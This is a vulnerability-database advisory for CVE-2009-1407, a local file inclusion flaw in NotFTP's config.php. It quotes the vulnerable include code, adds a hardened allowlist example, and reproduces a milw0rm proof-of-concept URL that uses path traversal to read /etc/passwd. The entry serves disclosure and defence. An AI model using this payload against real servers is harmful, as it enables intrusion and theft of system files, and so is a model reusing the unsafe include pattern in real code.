Wonko NotFTP config.php Local File Inclusion Vulnerability

Vulnerability ID: 1117632    Vulnerability type: Path traversal
Published: 2009-04-21    Updated: 2009-04-24
CVE ID: CVE-2009-1407    CNNVD-ID: CNNVD-200904-476
Platform: PHP    CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/8504
https://cxsecurity.com/issue/WLB-2009040231
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-476
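|Vulnerability details
NotFTP is a web-based HTTP-FTP gateway written in PHP. The config.php script in NotFTP does not properly filter user-supplied parameters. If a remote attacker uses the newlang parameter in a URL request to specify a malicious file on the local system, they may be able to read sensitive information from the web server or execute arbitrary code. The following is the vulnerable code segment in config.php:

if (isset($newlang))
{
   require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
   require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
   require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}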
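A hardened form of the language selection shown above, as an added example (not NotFTP's code and not a vendor patch): the language key is read explicitly from the query string and cookie, checked against an allowlist held in a constant, and the resolved path is confirmed to stay inside the language directory. `resolve_lang_file()`, the `LANGUAGES` entries and the value of `DEFAULTLANG` are assumptions made for illustration.

```php
<?php
// Added example, not NotFTP code. LANGUAGES entries, DEFAULTLANG's value and
// resolve_lang_file() are hypothetical; only the parameter names come from the page.
const DEFAULTLANG = 'en';
// The allowlist lives in a constant, so no request parameter can replace it.
const LANGUAGES = ['en' => 'english.php', 'pl' => 'polish.php'];

function resolve_lang_file(array $query, array $cookies, string $baseDir): string
{
    // Same precedence as config.php: newlang, then the cookie, then the default.
    $key = DEFAULTLANG;
    foreach ([$query['newlang'] ?? null, $cookies['notftplang'] ?? null] as $c) {
        // is_string() rejects array-valued parameters such as newlang[]=x.
        if (is_string($c) && array_key_exists($c, LANGUAGES)) {
            $key = $c;
            break;
        }
    }
    // Defence in depth: drop directory parts, then confirm the resolved
    // path is still inside the language directory.
    $root = realpath($baseDir);
    $real = realpath($baseDir . '/' . basename(LANGUAGES[$key]));
    if ($root === false || $real === false
        || strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('language file not found under ' . $baseDir);
    }
    return $real;
}

// Constructed demo: a temporary language directory with two sample files.
$base = sys_get_temp_dir() . '/notftp_lang_demo';
if (!is_dir($base)) {
    mkdir($base, 0700, true);
}
foreach (LANGUAGES as $file) {
    file_put_contents("$base/$file", "<?php // constructed sample\n");
}
// Constructed request carrying the same parameters as the PoC on this page.
$poc = ['newlang' => 'kacper',
        'languages' => ['kacper' => ['file' => '../../../../../etc/passwd']]];
echo basename(resolve_lang_file($poc, [], $base)), PHP_EOL;               // unknown key: default is used
echo basename(resolve_lang_file(['newlang' => 'pl'], [], $base)), PHP_EOL; // allowlisted key is accepted
require_once resolve_lang_file([], ['notftplang' => 'pl'], $base);        // cookie path, then include
```

The request-supplied `languages` array is never consulted, so an unknown key can only select the default language file.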
|Exploit
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/


Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/

DC++ Hub address: bluber-hub.no-ip.biz:2008

Vuln:

File config.php:

#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################

if (isset($newlang))
{
   require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
   require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
   require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}

# NotFTP version. Changing this would be silly. So don't.

PoC:

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd

The End

========= 

# milw0rm.com [2009-04-21]
|References

Source: XF
Name: notftp-config-file-include(49988)
Link: http://xforce.iss.net/xforce/xfdb/49988
Source: BID
Name: 34636
Link: http://www.securityfocus.com/bid/34636
Source: MILW0RM
Name: 8504
Link: http://www.milw0rm.com/exploits/8504